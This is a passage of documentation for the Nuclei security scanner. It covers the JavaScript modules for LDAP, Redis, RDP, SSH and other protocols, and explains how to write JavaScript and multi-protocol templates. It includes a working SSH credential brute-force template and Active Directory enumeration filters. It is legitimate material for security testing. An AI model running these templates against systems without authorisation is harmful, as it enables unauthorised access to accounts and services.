• `Const` **FilterIsAdmin**: `"(adminCount=1)"`
The object is an admin.
#### Defined in
ldap.ts:28
***
### FilterIsComputer
• `Const` **FilterIsComputer**: `"(objectCategory=computer)"`
The object is a computer.
#### Defined in
ldap.ts:31
***
### FilterIsDuplicateAccount
• `Const` **FilterIsDuplicateAccount**: `"(userAccountControl:1.2.840.113556.1.4.803:=256)"`
It's an account for users whose primary account is in another domain.
#### Defined in
ldap.ts:34
***
### FilterIsGroup
• `Const` **FilterIsGroup**: `"(objectCategory=group)"`
The object is a group.
#### Defined in
ldap.ts:37
***
### FilterIsNormalAccount
• `Const` **FilterIsNormalAccount**: `"(userAccountControl:1.2.840.113556.1.4.803:=512)"`
It's a default account type that represents a typical user.
#### Defined in
ldap.ts:40
***
### FilterIsPerson
• `Const` **FilterIsPerson**: `"(objectCategory=person)"`
The object is a person.
#### Defined in
ldap.ts:43
***
### FilterLockout
• `Const` **FilterLockout**: `"(userAccountControl:1.2.840.113556.1.4.803:=16)"`
The user is locked out.
#### Defined in
ldap.ts:46
***
### FilterLogonScript
• `Const` **FilterLogonScript**: `"(userAccountControl:1.2.840.113556.1.4.803:=1)"`
The logon script will be run.
#### Defined in
ldap.ts:49
***
### FilterMnsLogonAccount
• `Const` **FilterMnsLogonAccount**: `"(userAccountControl:1.2.840.113556.1.4.803:=131072)"`
It's an MNS logon account.
#### Defined in
ldap.ts:52
***
### FilterNotDelegated
• `Const` **FilterNotDelegated**: `"(userAccountControl:1.2.840.113556.1.4.803:=1048576)"`
When this flag is set, the security context of the user isn't delegated to a service even if the service account is set as trusted for Kerberos delegation.
#### Defined in
ldap.ts:55
***
### FilterPartialSecretsAccount
• `Const` **FilterPartialSecretsAccount**: `"(userAccountControl:1.2.840.113556.1.4.803:=67108864)"`
The account is a read-only domain controller (RODC).
#### Defined in
ldap.ts:58
***
### FilterPasswordCantChange
• `Const` **FilterPasswordCantChange**: `"(userAccountControl:1.2.840.113556.1.4.803:=64)"`
The user can't change the password.
#### Defined in
ldap.ts:61
***
### FilterPasswordExpired
• `Const` **FilterPasswordExpired**: `"(userAccountControl:1.2.840.113556.1.4.803:=8388608)"`
The user's password has expired.
#### Defined in
ldap.ts:64
***
### FilterPasswordNotRequired
• `Const` **FilterPasswordNotRequired**: `"(userAccountControl:1.2.840.113556.1.4.803:=32)"`
No password is required.
#### Defined in
ldap.ts:67
***
### FilterServerTrustAccount
• `Const` **FilterServerTrustAccount**: `"(userAccountControl:1.2.840.113556.1.4.803:=8192)"`
It's a computer account for a domain controller that is a member of this domain.
#### Defined in
ldap.ts:70
***
### FilterSmartCardRequired
• `Const` **FilterSmartCardRequired**: `"(userAccountControl:1.2.840.113556.1.4.803:=262144)"`
When this flag is set, it forces the user to log on by using a smart card.
#### Defined in
ldap.ts:73
***
### FilterTrustedForDelegation
• `Const` **FilterTrustedForDelegation**: `"(userAccountControl:1.2.840.113556.1.4.803:=524288)"`
When this flag is set, the service account (the user or computer account) under which a service runs is trusted for Kerberos delegation.
#### Defined in
ldap.ts:76
***
### FilterTrustedToAuthForDelegation
• `Const` **FilterTrustedToAuthForDelegation**: `"(userAccountControl:1.2.840.113556.1.4.803:=16777216)"`
The account is enabled for delegation.
#### Defined in
ldap.ts:79
***
### FilterUseDesKeyOnly
• `Const` **FilterUseDesKeyOnly**: `"(userAccountControl:1.2.840.113556.1.4.803:=2097152)"`
Restrict this principal to use only Data Encryption Standard (DES) encryption types for keys.
#### Defined in
ldap.ts:82
***
### FilterWorkstationTrustAccount
• `Const` **FilterWorkstationTrustAccount**: `"(userAccountControl:1.2.840.113556.1.4.803:=4096)"`
It's a computer account for a computer that is running old Windows builds.
#### Defined in
ldap.ts:85
## Functions
### DecodeADTimestamp
▸ **DecodeADTimestamp**(`timestamp`): `string`
DecodeADTimestamp decodes an Active Directory timestamp
#### Parameters
| Name | Type |
| :---------- | :------- |
| `timestamp` | `string` |
#### Returns
`string`
**`Example`**
```javascript
const ldap = require('nuclei/ldap');
const timestamp = ldap.DecodeADTimestamp('132036744000000000');
log(timestamp);
```
#### Defined in
ldap.ts:96
***
### DecodeSID
▸ **DecodeSID**(`s`): `string`
DecodeSID decodes a SID string
#### Parameters
| Name | Type |
| :--- | :------- |
| `s` | `string` |
#### Returns
`string`
**`Example`**
```javascript
const ldap = require('nuclei/ldap');
const sid = ldap.DecodeSID('S-1-5-21-3623811015-3361044348-30300820-1013');
log(sid);
```
#### Defined in
ldap.ts:111
***
### DecodeZuluTimestamp
▸ **DecodeZuluTimestamp**(`timestamp`): `string`
DecodeZuluTimestamp decodes a Zulu timestamp
#### Parameters
| Name | Type |
| :---------- | :------- |
| `timestamp` | `string` |
#### Returns
`string`
**`Example`**
```javascript
const ldap = require('nuclei/ldap');
const timestamp = ldap.DecodeZuluTimestamp('2021-08-25T10:00:00Z');
log(timestamp);
```
#### Defined in
ldap.ts:126
***
### JoinFilters
▸ **JoinFilters**(`filters`): `string`
JoinFilters joins multiple filters into a single filter
#### Parameters
| Name | Type |
| :-------- | :---- |
| `filters` | `any` |
#### Returns
`string`
**`Example`**
```javascript
const ldap = require('nuclei/ldap');
const filter = ldap.JoinFilters(ldap.FilterIsPerson, ldap.FilterAccountEnabled);
```
#### Defined in
ldap.ts:140
***
### NegativeFilter
▸ **NegativeFilter**(`filter`): `string`
NegativeFilter returns a negative filter for a given filter
#### Parameters
| Name | Type |
| :------- | :------- |
| `filter` | `string` |
#### Returns
`string`
**`Example`**
```javascript
const ldap = require('nuclei/ldap');
const filter = ldap.NegativeFilter(ldap.FilterIsPerson);
```
#### Defined in
ldap.ts:154
# null
Source: https://docs.projectdiscovery.io/templates/protocols/javascript/modules/mssql
# Namespace: mssql
## Table of contents
### Classes
* [MSSQLClient](/templates/protocols/javascript/modules/mssql.MSSQLClient)
# null
Source: https://docs.projectdiscovery.io/templates/protocols/javascript/modules/mysql
# Namespace: mysql
## Table of contents
### Classes
* [MySQLClient](/templates/protocols/javascript/modules/mysql.MySQLClient)
### Interfaces
* [MySQLInfo](/templates/protocols/javascript/modules/mysql.MySQLInfo)
* [MySQLOptions](/templates/protocols/javascript/modules/mysql.MySQLOptions)
* [SQLResult](/templates/protocols/javascript/modules/mysql.SQLResult)
* [ServiceMySQL](/templates/protocols/javascript/modules/mysql.ServiceMySQL)
### Functions
* [BuildDSN](/templates/protocols/javascript/modules/mysql#builddsn)
## Functions
### BuildDSN
▸ **BuildDSN**(`opts`): `string` | `null`
BuildDSN builds a MySQL data source name (DSN) from the given options.
#### Parameters
| Name | Type |
| :----- | :--------------------------------------------------------------------------- |
| `opts` | [`MySQLOptions`](/templates/protocols/javascript/modules/mysql.MySQLOptions) |
#### Returns
`string` | `null`
**`Example`**
```javascript
const mysql = require('nuclei/mysql');
const options = new mysql.MySQLOptions();
options.Host = 'acme.com';
options.Port = 3306;
const dsn = mysql.BuildDSN(options);
```
#### Defined in
mysql.ts:14
# null
Source: https://docs.projectdiscovery.io/templates/protocols/javascript/modules/net
# Namespace: net
## Table of contents
### Classes
* [NetConn](/templates/protocols/javascript/modules/net.NetConn)
### Functions
* [Open](/templates/protocols/javascript/modules/net#open)
* [OpenTLS](/templates/protocols/javascript/modules/net#opentls)
## Functions
### Open
▸ **Open**(`protocol`): [`NetConn`](/templates/protocols/javascript/modules/net.NetConn) | `null`
Open opens a new connection to the address with a timeout.
supported protocols: tcp, udp
#### Parameters
| Name | Type |
| :--------- | :------- |
| `protocol` | `string` |
#### Returns
[`NetConn`](/templates/protocols/javascript/modules/net.NetConn) | `null`
**`Example`**
```javascript
const net = require('nuclei/net');
const conn = net.Open('tcp', 'acme.com:80');
```
#### Defined in
net.ts:12
***
### OpenTLS
▸ **OpenTLS**(`protocol`): [`NetConn`](/templates/protocols/javascript/modules/net.NetConn) | `null`
Open opens a new connection to the address with a timeout.
supported protocols: tcp, udp
#### Parameters
| Name | Type |
| :--------- | :------- |
| `protocol` | `string` |
#### Returns
[`NetConn`](/templates/protocols/javascript/modules/net.NetConn) | `null`
**`Example`**
```javascript
const net = require('nuclei/net');
const conn = net.OpenTLS('tcp', 'acme.com:443');
```
#### Defined in
net.ts:27
# null
Source: https://docs.projectdiscovery.io/templates/protocols/javascript/modules/oracle
# Namespace: oracle
## Table of contents
### Interfaces
* [IsOracleResponse](/templates/protocols/javascript/modules/oracle.IsOracleResponse)
### Functions
* [IsOracle](/templates/protocols/javascript/modules/oracle#isoracle)
## Functions
### IsOracle
▸ **IsOracle**(`host`, `port`): [`IsOracleResponse`](/templates/protocols/javascript/modules/oracle.IsOracleResponse) | `null`
IsOracle checks if a host is running an Oracle server
#### Parameters
| Name | Type |
| :----- | :------- |
| `host` | `string` |
| `port` | `number` |
#### Returns
[`IsOracleResponse`](/templates/protocols/javascript/modules/oracle.IsOracleResponse) | `null`
**`Example`**
```javascript
const oracle = require('nuclei/oracle');
const isOracle = oracle.IsOracle('acme.com', 1521);
log(toJSON(isOracle));
```
#### Defined in
oracle.ts:12
# null
Source: https://docs.projectdiscovery.io/templates/protocols/javascript/modules/pop3
# Namespace: pop3
## Table of contents
### Interfaces
* [IsPOP3Response](/templates/protocols/javascript/modules/pop3.IsPOP3Response)
### Functions
* [IsPOP3](/templates/protocols/javascript/modules/pop3#ispop3)
## Functions
### IsPOP3
▸ **IsPOP3**(`host`, `port`): [`IsPOP3Response`](/templates/protocols/javascript/modules/pop3.IsPOP3Response) | `null`
IsPOP3 checks if a host is running a POP3 server.
#### Parameters
| Name | Type |
| :----- | :------- |
| `host` | `string` |
| `port` | `number` |
#### Returns
[`IsPOP3Response`](/templates/protocols/javascript/modules/pop3.IsPOP3Response) | `null`
**`Example`**
```javascript
const pop3 = require('nuclei/pop3');
const isPOP3 = pop3.IsPOP3('acme.com', 110);
log(toJSON(isPOP3));
```
#### Defined in
pop3.ts:12
# null
Source: https://docs.projectdiscovery.io/templates/protocols/javascript/modules/postgres
# Namespace: postgres
## Table of contents
### Classes
* [PGClient](/templates/protocols/javascript/modules/postgres.PGClient)
### Interfaces
* [SQLResult](/templates/protocols/javascript/modules/postgres.SQLResult)
# null
Source: https://docs.projectdiscovery.io/templates/protocols/javascript/modules/rdp
# Namespace: rdp
## Table of contents
### Interfaces
* [CheckRDPAuthResponse](/templates/protocols/javascript/modules/rdp.CheckRDPAuthResponse)
* [IsRDPResponse](/templates/protocols/javascript/modules/rdp.IsRDPResponse)
* [ServiceRDP](/templates/protocols/javascript/modules/rdp.ServiceRDP)
### Functions
* [CheckRDPAuth](/templates/protocols/javascript/modules/rdp#checkrdpauth)
* [IsRDP](/templates/protocols/javascript/modules/rdp#isrdp)
## Functions
### CheckRDPAuth
▸ **CheckRDPAuth**(`host`, `port`): [`CheckRDPAuthResponse`](/templates/protocols/javascript/modules/rdp.CheckRDPAuthResponse) | `null`
CheckRDPAuth checks if the given host and port are running rdp server
with authentication and returns their metadata.
If connection is successful, it returns true.
#### Parameters
| Name | Type |
| :----- | :------- |
| `host` | `string` |
| `port` | `number` |
#### Returns
[`CheckRDPAuthResponse`](/templates/protocols/javascript/modules/rdp.CheckRDPAuthResponse) | `null`
**`Example`**
```javascript
const rdp = require('nuclei/rdp');
const checkRDPAuth = rdp.CheckRDPAuth('acme.com', 3389);
log(toJSON(checkRDPAuth));
```
#### Defined in
rdp.ts:14
***
### IsRDP
▸ **IsRDP**(`host`, `port`): [`IsRDPResponse`](/templates/protocols/javascript/modules/rdp.IsRDPResponse) | `null`
IsRDP checks if the given host and port are running rdp server.
If connection is successful, it returns true.
If connection is unsuccessful, it returns false and error.
The Name of the OS is also returned if the connection is successful.
#### Parameters
| Name | Type |
| :----- | :------- |
| `host` | `string` |
| `port` | `number` |
#### Returns
[`IsRDPResponse`](/templates/protocols/javascript/modules/rdp.IsRDPResponse) | `null`
**`Example`**
```javascript
const rdp = require('nuclei/rdp');
const isRDP = rdp.IsRDP('acme.com', 3389);
log(toJSON(isRDP));
```
#### Defined in
rdp.ts:32
# null
Source: https://docs.projectdiscovery.io/templates/protocols/javascript/modules/redis
# Namespace: redis
## Table of contents
### Functions
* [Connect](/templates/protocols/javascript/modules/redis#connect)
* [GetServerInfo](/templates/protocols/javascript/modules/redis#getserverinfo)
* [GetServerInfoAuth](/templates/protocols/javascript/modules/redis#getserverinfoauth)
* [IsAuthenticated](/templates/protocols/javascript/modules/redis#isauthenticated)
* [RunLuaScript](/templates/protocols/javascript/modules/redis#runluascript)
## Functions
### Connect
▸ **Connect**(`host`, `port`, `password`): `boolean` | `null`
Connect tries to connect redis server with password
#### Parameters
| Name | Type |
| :--------- | :------- |
| `host` | `string` |
| `port` | `number` |
| `password` | `string` |
#### Returns
`boolean` | `null`
**`Example`**
```javascript
const redis = require('nuclei/redis');
const connected = redis.Connect('acme.com', 6379, 'password');
```
#### Defined in
redis.ts:11
***
### GetServerInfo
▸ **GetServerInfo**(`host`, `port`): `string` | `null`
GetServerInfo returns the server info for a redis server
#### Parameters
| Name | Type |
| :----- | :------- |
| `host` | `string` |
| `port` | `number` |
#### Returns
`string` | `null`
**`Example`**
```javascript
const redis = require('nuclei/redis');
const info = redis.GetServerInfo('acme.com', 6379);
```
#### Defined in
redis.ts:25
***
### GetServerInfoAuth
▸ **GetServerInfoAuth**(`host`, `port`, `password`): `string` | `null`
GetServerInfoAuth returns the server info for a redis server
#### Parameters
| Name | Type |
| :--------- | :------- |
| `host` | `string` |
| `port` | `number` |
| `password` | `string` |
#### Returns
`string` | `null`
**`Example`**
```javascript
const redis = require('nuclei/redis');
const info = redis.GetServerInfoAuth('acme.com', 6379, 'password');
```
#### Defined in
redis.ts:39
***
### IsAuthenticated
▸ **IsAuthenticated**(`host`, `port`): `boolean` | `null`
IsAuthenticated checks if the redis server requires authentication
#### Parameters
| Name | Type |
| :----- | :------- |
| `host` | `string` |
| `port` | `number` |
#### Returns
`boolean` | `null`
**`Example`**
```javascript
const redis = require('nuclei/redis');
const isAuthenticated = redis.IsAuthenticated('acme.com', 6379);
```
#### Defined in
redis.ts:53
***
### RunLuaScript
▸ **RunLuaScript**(`host`, `port`, `password`, `script`): `any` | `null`
RunLuaScript runs a lua script on the redis server
#### Parameters
| Name | Type |
| :--------- | :------- |
| `host` | `string` |
| `port` | `number` |
| `password` | `string` |
| `script` | `string` |
#### Returns
`any` | `null`
**`Example`**
```javascript
const redis = require('nuclei/redis');
const result = redis.RunLuaScript('acme.com', 6379, 'password', 'return redis.call("get", KEYS[1])');
```
#### Defined in
redis.ts:67
# null
Source: https://docs.projectdiscovery.io/templates/protocols/javascript/modules/rsync
# Namespace: rsync
## Table of contents
### Interfaces
* [IsRsyncResponse](/templates/protocols/javascript/modules/rsync.IsRsyncResponse)
### Functions
* [IsRsync](/templates/protocols/javascript/modules/rsync#isrsync)
## Functions
### IsRsync
▸ **IsRsync**(`host`, `port`): [`IsRsyncResponse`](/templates/protocols/javascript/modules/rsync.IsRsyncResponse) | `null`
IsRsync checks if a host is running a Rsync server.
#### Parameters
| Name | Type |
| :----- | :------- |
| `host` | `string` |
| `port` | `number` |
#### Returns
[`IsRsyncResponse`](/templates/protocols/javascript/modules/rsync.IsRsyncResponse) | `null`
**`Example`**
```javascript
const rsync = require('nuclei/rsync');
const isRsync = rsync.IsRsync('acme.com', 873);
log(toJSON(isRsync));
```
#### Defined in
rsync.ts:12
# null
Source: https://docs.projectdiscovery.io/templates/protocols/javascript/modules/smb
# Namespace: smb
## Table of contents
### Classes
* [SMBClient](/templates/protocols/javascript/modules/smb.SMBClient)
### Interfaces
* [HeaderLog](/templates/protocols/javascript/modules/smb.HeaderLog)
* [NegotiationLog](/templates/protocols/javascript/modules/smb.NegotiationLog)
* [SMBCapabilities](/templates/protocols/javascript/modules/smb.SMBCapabilities)
* [SMBLog](/templates/protocols/javascript/modules/smb.SMBLog)
* [SMBVersions](/templates/protocols/javascript/modules/smb.SMBVersions)
* [ServiceSMB](/templates/protocols/javascript/modules/smb.ServiceSMB)
* [SessionSetupLog](/templates/protocols/javascript/modules/smb.SessionSetupLog)
# null
Source: https://docs.projectdiscovery.io/templates/protocols/javascript/modules/smtp
# Namespace: smtp
## Table of contents
### Classes
* [Client](/templates/protocols/javascript/modules/smtp.Client)
* [SMTPMessage](/templates/protocols/javascript/modules/smtp.SMTPMessage)
### Interfaces
* [SMTPResponse](/templates/protocols/javascript/modules/smtp.SMTPResponse)
# null
Source: https://docs.projectdiscovery.io/templates/protocols/javascript/modules/ssh
# Namespace: ssh
## Table of contents
### Classes
* [SSHClient](/templates/protocols/javascript/modules/ssh.SSHClient)
### Interfaces
* [Algorithms](/templates/protocols/javascript/modules/ssh.Algorithms)
* [DirectionAlgorithms](/templates/protocols/javascript/modules/ssh.DirectionAlgorithms)
* [EndpointId](/templates/protocols/javascript/modules/ssh.EndpointId)
* [HandshakeLog](/templates/protocols/javascript/modules/ssh.HandshakeLog)
* [KexInitMsg](/templates/protocols/javascript/modules/ssh.KexInitMsg)
# null
Source: https://docs.projectdiscovery.io/templates/protocols/javascript/modules/structs
# Namespace: structs
## Table of contents
### Functions
* [Pack](/templates/protocols/javascript/modules/structs#pack)
* [StructsCalcSize](/templates/protocols/javascript/modules/structs#structscalcsize)
* [Unpack](/templates/protocols/javascript/modules/structs#unpack)
## Functions
### Pack
▸ **Pack**(`formatStr`, `msg`): `Uint8Array` | `null`
StructsPack returns a byte slice containing the values of msg slice packed according to the given format.
The items of msg slice must match the values required by the format exactly.
Ex: structs.pack("H", 0)
#### Parameters
| Name | Type |
| :---------- | :------- |
| `formatStr` | `string` |
| `msg` | `any` |
#### Returns
`Uint8Array` | `null`
**`Example`**
```javascript
const structs = require('nuclei/structs');
const packed = structs.Pack('H', [0]);
```
#### Defined in
structs.ts:13
***
### StructsCalcSize
▸ **StructsCalcSize**(`format`): `number` | `null`
StructsCalcSize returns the number of bytes needed to pack the values according to the given format.
Ex: structs.CalcSize("H")
#### Parameters
| Name | Type |
| :------- | :------- |
| `format` | `string` |
#### Returns
`number` | `null`
**`Example`**
```javascript
const structs = require('nuclei/structs');
const size = structs.CalcSize('H');
```
#### Defined in
structs.ts:28
***
### Unpack
▸ **Unpack**(`format`, `msg`): `any` | `null`
StructsUnpack the byte slice (presumably packed by Pack(format, msg)) according to the given format.
The result is a \[]interface{} slice even if it contains exactly one item.
The byte slice must contain not less the amount of data required by the format
(len(msg) must more or equal CalcSize(format)).
Ex: structs.Unpack(">I", buff\[:nb])
#### Parameters
| Name | Type |
| :------- | :----------- |
| `format` | `string` |
| `msg` | `Uint8Array` |
#### Returns
`any` | `null`
**`Example`**
```javascript
const structs = require('nuclei/structs');
const result = structs.Unpack('H', [0]);
```
#### Defined in
structs.ts:46
# null
Source: https://docs.projectdiscovery.io/templates/protocols/javascript/modules/telnet
# Namespace: telnet
## Table of contents
### Interfaces
* [IsTelnetResponse](/templates/protocols/javascript/modules/telnet.IsTelnetResponse)
### Functions
* [IsTelnet](/templates/protocols/javascript/modules/telnet#istelnet)
## Functions
### IsTelnet
▸ **IsTelnet**(`host`, `port`): [`IsTelnetResponse`](/templates/protocols/javascript/modules/telnet.IsTelnetResponse) | `null`
IsTelnet checks if a host is running a Telnet server.
#### Parameters
| Name | Type |
| :----- | :------- |
| `host` | `string` |
| `port` | `number` |
#### Returns
[`IsTelnetResponse`](/templates/protocols/javascript/modules/telnet.IsTelnetResponse) | `null`
**`Example`**
```javascript
const telnet = require('nuclei/telnet');
const isTelnet = telnet.IsTelnet('acme.com', 23);
log(toJSON(isTelnet));
```
#### Defined in
telnet.ts:12
# null
Source: https://docs.projectdiscovery.io/templates/protocols/javascript/modules/vnc
# Namespace: vnc
## Table of contents
### Interfaces
* [IsVNCResponse](/templates/protocols/javascript/modules/vnc.IsVNCResponse)
### Functions
* [IsVNC](/templates/protocols/javascript/modules/vnc#isvnc)
## Functions
### IsVNC
▸ **IsVNC**(`host`, `port`): [`IsVNCResponse`](/templates/protocols/javascript/modules/vnc.IsVNCResponse) | `null`
IsVNC checks if a host is running a VNC server.
It returns a boolean indicating if the host is running a VNC server
and the banner of the VNC server.
#### Parameters
| Name | Type |
| :----- | :------- |
| `host` | `string` |
| `port` | `number` |
#### Returns
[`IsVNCResponse`](/templates/protocols/javascript/modules/vnc.IsVNCResponse) | `null`
**`Example`**
```javascript
const vnc = require('nuclei/vnc');
const isVNC = vnc.IsVNC('acme.com', 5900);
log(toJSON(isVNC));
```
#### Defined in
vnc.ts:14
# JavaScript Protocol
Source: https://docs.projectdiscovery.io/templates/protocols/javascript/protocol
Review examples of JavaScript with Nuclei v3
The JavaScript protocol was added to Nuclei v3 to allow you to write checks and detections for exploits in JavaScript and to bridge the gap between network protocols.
* Internally any content written using the JavaScript protocol is executed in Golang.
* The JavaScript protocol is **not** intended to fit into or be imported with any existing JavaScript libraries or frameworks outside of the Nuclei ecosystem.
* Nuclei provides a set of functions, libraries that are tailor-made for writing exploits and checks and only adds required/necessary functionality to complement existing YAML-based DSL.
* The JavaScript protocol is **not** intended to be used as a general purpose JavaScript runtime and does not replace matchers, extractors, or any existing functionality of Nuclei.
* Nuclei v3.0.0 ships with **15+ libraries (ssh, ftp, RDP, Kerberos, and Redis)** tailored for writing exploits and checks in JavaScript and will be continuously expanded in the future.
## Simple Example
Here is a basic example of a JavaScript protocol template:
```yaml
id: ssh-server-fingerprint
info:
name: Fingerprint SSH Server Software
author: Ice3man543,tarunKoyalwar
severity: info
javascript:
- code: |
var m = require("nuclei/ssh");
var c = m.SSHClient();
var response = c.ConnectSSHInfoMode(Host, Port);
to_json(response);
args:
Host: "{{Host}}"
Port: "22"
extractors:
- type: json
json:
- '.ServerID.Raw'
```
In the Nuclei template example above, we are fingerprinting SSH server software by connecting in non-auth mode and extracting the server banner. Let's break down the template.
### Code Section
The `code:` contains actual JavaScript code that is executed by Nuclei at runtime. In the above template, we are:
* Importing `nuclei/ssh` module/library
* Creating a new instance of `SSHClient` object
* Connecting to SSH server in `Info` mode
* Converting response to json
### Args Section
The `args:` section can be simply understood as variables in JavaScript that are passed at runtime and support DSL usage.
### Output Section
The value of the last expression is returned as the output of JavaScript protocol template and can be used in matchers and extractors. If the server returns an error instead, then the `error` variable is exposed in the matcher or extractor with an error message.
## SSH Bruteforce Example
**SSH Password Bruteforce Template**
```yaml
id: ssh-brute
info:
name: SSH Credential Stuffing
author: tarunKoyalwar
severity: critical
javascript:
- pre-condition: |
var m = require("nuclei/ssh");
var c = m.SSHClient();
var response = c.ConnectSSHInfoMode(Host, Port);
// only bruteforce if ssh server allows password based authentication
response["UserAuth"].includes("password")
code: |
var m = require("nuclei/ssh");
var c = m.SSHClient();
c.Connect(Host,Port,Username,Password);
args:
Host: "{{Host}}"
Port: "22"
Username: "{{usernames}}"
Password: "{{passwords}}"
threads: 10
attack: clusterbomb
payloads:
usernames: helpers/wordlists/wp-users.txt
passwords: helpers/wordlists/wp-passwords.txt
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- "response == true"
- "success == true"
condition: and
```
In the example template above, we are bruteforcing ssh server with a list of usernames and passwords. We can tell that this might not have been possible to achieve with the network template. Let's break down the template.
### Pre-Condition
`pre-condition` is an optional section of JavaScript code that is executed before running “code” and acts as a pre-condition to exploit. In the above template, before attempting brute force, we check if:
* The address is actually an SSH server.
* The ssh server is configured to allow password-based authentication.
**Further explanation**
* If pre-condition returns `true` only then `code` is executed; otherwise, it is skipped.
* In the code section, we import `nuclei/ssh` module and create a new instance of `SSHClient` object.
* Then we attempt to connect to the ssh server with a username and password.
This template uses [payloads](https://docs.projectdiscovery.io/templates/protocols/http/http-payloads) to launch a clusterbomb attack with 10 threads and exits on the first match.
Looking at this template now, we can tell that JavaScript templates are powerful for writing multistep and protocol/vendor-specific exploits, which is a primary goal of the JavaScript protocol.
## Init
`init` is an optional JavaScript section that can be used to initialize the template, and it is executed just after compiling the template and before running it on any target. Although it is rarely needed, it can be used to load and preprocess data before running a template on any target.
For example, in the below code block, we are loading all ssh private keys from `nuclei-templates/helpers` directory and storing them as a variable in payloads with the name `keys`. If we were loading private keys from the "pre-condition" code block, then it would have been loaded for every target, which is not ideal.
```
variables:
keysDir: "helpers/" # load all private keys from this directory
javascript:
# init field can be used to make any preperations before the actual exploit
# here we are reading all private keys from helpers folder and storing them in a list
- init: |
let m = require('nuclei/fs');
let privatekeys = m.ReadFilesFromDir(keysDir)
updatePayload('keys',privatekeys)
payloads:
# 'keys' will be updated by actual private keys after init is executed
keys:
- key1
- key2
```
Two special functions that are available in the `init` block are
| Function | Description |
| -------------------------- | ---------------------------------------- |
| `updatePayload(key,value)` | updates payload with given key and value |
| `set(key,value)` | sets a variable with given key and value |
A collection of JavaScript protocol templates can be found [here](https://github.com/projectdiscovery/nuclei-templates/pull/8530).
# Multi-protocol
Source: https://docs.projectdiscovery.io/templates/protocols/multi-protocol
Learn about multi-protocol support in Nuclei v3
Nuclei provides support for a variety of protocols including HTTP, DNS, Network, SSL, and Code. This allows users to write Nuclei templates for vulnerabilities across these protocols. However, there may be instances where a vulnerability requires the synchronous execution of multiple protocols for testing or exploitation. A prime example of this is **subdomain takeovers**, which necessitates a check for the CNAME record of a subdomain, followed by a verification of string in HTTP response. While this was partially achievable with workflows in Nuclei, the introduction of **Nuclei v3.0** has made it possible to conveniently write a **template** that can execute multiple protocols synchronously. This allows for checks to be performed on the results of each protocol, along with other enhancements.
**Example:**
```yaml
id: dns-http-template
info:
name: dns + http takeover template
author: pdteam
severity: info
dns:
- name: "{{FQDN}}" # dns request
type: cname
http:
- method: GET # http request
path:
- "{{BaseURL}}"
matchers:
- type: dsl
dsl:
- contains(http_body,'Domain not found') # check for string from http response
- contains(dns_cname, 'github.io') # check for cname from dns response
condition: and
```
The example above demonstrates that there is no need for new logic or syntax. Simply write the logic for each protocol and then use the protocol-prefixed variable or the [dynamic extractor](https://docs.projectdiscovery.io/templates/reference/extractors#dynamic-extractor) to export that variable. This variable is then shared across all protocols. We refer to this as the **Template Context**, which contains all variables that are scoped at the template level.
## Features
The following features enhance the power of multi-protocol execution:
* Protocol-Scoped Shared Variables Across Protocols
* Data Export across Protocols using Dynamic Extractor
### Protocol Scoped Variables
In the previous example, we demonstrated how to export the DNS CNAME and use it in an HTTP request. However, you might encounter a scenario where a template includes more than four protocols, and you need to export various response fields such as `subject_dn`, `ns`, `cname`, `header`, and so on. While you could achieve this by adding more dynamic extractors, this approach could clutter the template and introduce redundant logic, making it difficult to track and maintain all the variables.
To address this issue, multi-protocol execution supports template-scoped protocol responses. This means that all response fields from all protocols in a template are available in the template context with a protocol prefix.
Here's an example to illustrate this:
| Protocol | Response Field | Exported Variable |
| -------- | -------------- | ----------------- |
| ssl | subject\_cn | ssl\_subject\_cn |
| dns | cname | dns\_cname |
| http | header | http\_header |
| code | response | code\_response |
This is just an example, but it's important to note that the response fields of all protocols used in a multi-protocol template are exported.
**Example:**
```yaml
id: dns-ssl-http-proto-prefix
info:
name: multi protocol request with response fields
author: pdteam
severity: info
dns:
- name: "{{FQDN}}" # DNS Request
type: cname
ssl:
- address: "{{Hostname}}" # ssl request
http:
- method: GET # http request
path:
- "{{BaseURL}}"
matchers:
- type: dsl
dsl:
- contains(http_body,'ProjectDiscovery.io') # check for http string
- trim_suffix(dns_cname,'.ghost.io.') == 'projectdiscovery' # check for cname (extracted information from dns response)
- ssl_subject_cn == 'blog.projectdiscovery.io'
condition: and
```
To list all exported response fields write a multi protocol template and run it with `-v -svd` flag and it will print all exported response fields
Example:
```bash
nuclei -t multi-protocol-template.yaml -u scanme.sh -debug -svd
```
### Data Export across Protocols
If you are unfamiliar with dynamic extractors, we recommend reading the [dynamic extractor](https://docs.projectdiscovery.io/templates/reference/extractors#dynamic-extractor) section first.
Previously, Dynamic Extractors were only supported for specific protocols or workflows. However, with multi-protocol execution, dynamically extracted values are stored in the template context and can be used across all protocols.
**Example:**
```yaml
id: dns-http-template
info:
name: dns + http takeover template
author: pdteam
severity: info
dns:
- name: "{{FQDN}}" # dns request
type: cname
extractors:
- type: dsl
name: exported_cname
dsl:
- cname
internal: true
http:
- method: GET # http request
path:
- "{{BaseURL}}"
matchers:
- type: dsl
dsl:
- contains(body,'Domain not found') # check for http string
- contains(exported_cname, 'github.io') # check for cname (extracted information from dns response)
condition: and
```
## How Multi Protocol Works?
At this point we have seen how multi protocol templates look like and what are the features it brings to the table. Now let's see how multi protocol templates work and things to keep in mind while writing them.
* Multi Protocol Templates are executed in order of protocols defined in template.
* Protocols in multi protocol templates are executed in serial i.e one after another.
* Response fields of protocols are exported to template context as soon as that protocol is executed.
* Variables are scoped at template level and evaluated after each protocol execution.
* Multi protocol brings limited indirect support for preprocessing(using variables) and postprocessing(using dynamic extractors) for protocols.
## FAQ
**What Protocols are supported in Multi-Protocol Execution Mode?**
> There is no restriction around any protocol and any protocol available/implemented in nuclei engine can be used in multi protocol templates
**How many protocols can be used in Multi-Protocol Execution Mode?**
> There is no restriction around number of protocols but currently duplicated protocols are not supported i.e dns -> http -> ssl -> http. Please open a issue if you have a vulnerabilty/usecase that requires duplicated protocols
**What happens if a protocol fails?**
> Multi Protocol Execution follows exit on error policy i.e if protocol fails to execute then execution of remaining protocols is skipped and template execution is stopped
**How is multi protocol execution different from workflows?**
> Workflow as name suggest is a workflow that executes templates based on workflow file
>
> * Workflow does not contain actual logic of vulnerability but just a workflow that executes different templates
> * Workflow supports conditional execution of multiple templates
> * Workflow has limited supported for variables and dynamic extractors
To summarize workflow is a step higher than template and manages execution of templates based on workflow file
**Is multi protocol execution supported in nuclei v2?**
> No, Multi Protocol Execution is only supported in nuclei v3 and above
# Network Protocol
Source: https://docs.projectdiscovery.io/templates/protocols/network
Learn about network requests with Nuclei
